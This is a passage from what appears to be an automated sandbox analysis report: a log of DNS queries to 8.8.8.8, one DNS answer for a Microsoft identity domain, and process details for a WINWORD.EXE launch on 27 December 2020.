                                                                                                                                                      Dec 27, 2020 09:05:07.931938887 CET53513528.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:05:08.699075937 CET5014153192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:05:08.758399010 CET53501418.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:05:08.871206045 CET5934953192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:05:08.927510977 CET53593498.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:05:09.908705950 CET5708453192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:05:09.956603050 CET53570848.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:05:12.348119974 CET5882353192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:05:12.396107912 CET53588238.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:05:12.708048105 CET5014153192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:05:12.767544985 CET53501418.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:05:13.110593081 CET5756853192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:05:13.158530951 CET53575688.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:05:13.976516008 CET5054053192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:05:14.035629988 CET53505408.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:05:25.757175922 CET5436653192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:05:25.805228949 CET53543668.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:05:32.736511946 CET5303453192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:05:32.801937103 CET53530348.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:05:33.105364084 CET5776253192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:05:33.165462971 CET53577628.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:05:45.818533897 CET5543553192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:05:45.866543055 CET53554358.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:05:47.839067936 CET5071353192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:05:47.898080111 CET53507138.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:06:01.358840942 CET5613253192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:06:01.409641027 CET53561328.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:06:04.645646095 CET5898753192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:06:04.703567982 CET53589878.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:06:36.371282101 CET5657953192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:06:36.419629097 CET53565798.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:06:37.709011078 CET6063353192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:06:37.780196905 CET53606338.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:07:48.358314037 CET6129253192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:07:48.433207035 CET53612928.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:07:49.017365932 CET6361953192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:07:49.073883057 CET53636198.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:07:49.616621017 CET6493853192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:07:49.675379992 CET53649388.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:07:50.134228945 CET6194653192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:07:50.193504095 CET53619468.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:07:50.661577940 CET6491053192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:07:50.719871998 CET53649108.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:07:51.295795918 CET5212353192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:07:51.355524063 CET53521238.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:07:52.282711983 CET5613053192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:07:52.342207909 CET53561308.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:07:53.083095074 CET5633853192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:07:53.139586926 CET53563388.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:07:54.364417076 CET5942053192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:07:54.420855999 CET53594208.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:07:54.877176046 CET5878453192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:07:54.933758974 CET53587848.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:09:26.933121920 CET6397853192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:09:26.992784023 CET53639788.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:09:48.236224890 CET6293853192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:09:48.295532942 CET53629388.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:09:48.874748945 CET5570853192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:09:48.939668894 CET53557088.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:09:52.233355999 CET5680353192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:09:52.304577112 CET53568038.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:09:55.884567022 CET5714553192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:09:55.941106081 CET53571458.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:09:56.410672903 CET5535953192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:09:56.469995975 CET53553598.8.8.8192.168.2.3

                                                                                                                                                      DNS Answers

                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                      Dec 27, 2020 09:09:48.295532942 CET8.8.8.8192.168.2.30xf21cNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)

                                                                                                                                                      Code Manipulations

                                                                                                                                                      Statistics

                                                                                                                                                      System Behavior

                                                                                                                                                      Analysis Process: WINWORD.EXE PID: 5544 Parent PID: 792

                                                                                                                                                      General

                                                                                                                                                      Start time:09:05:02
                                                                                                                                                      Start date:27/12/2020
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
                                                                                                                                                      Imagebase:0x1300000
                                                                                                                                                      File size:1937688 bytes
                                                                                                                                                      MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Disassembly

                                                                                                                                                      Reset < >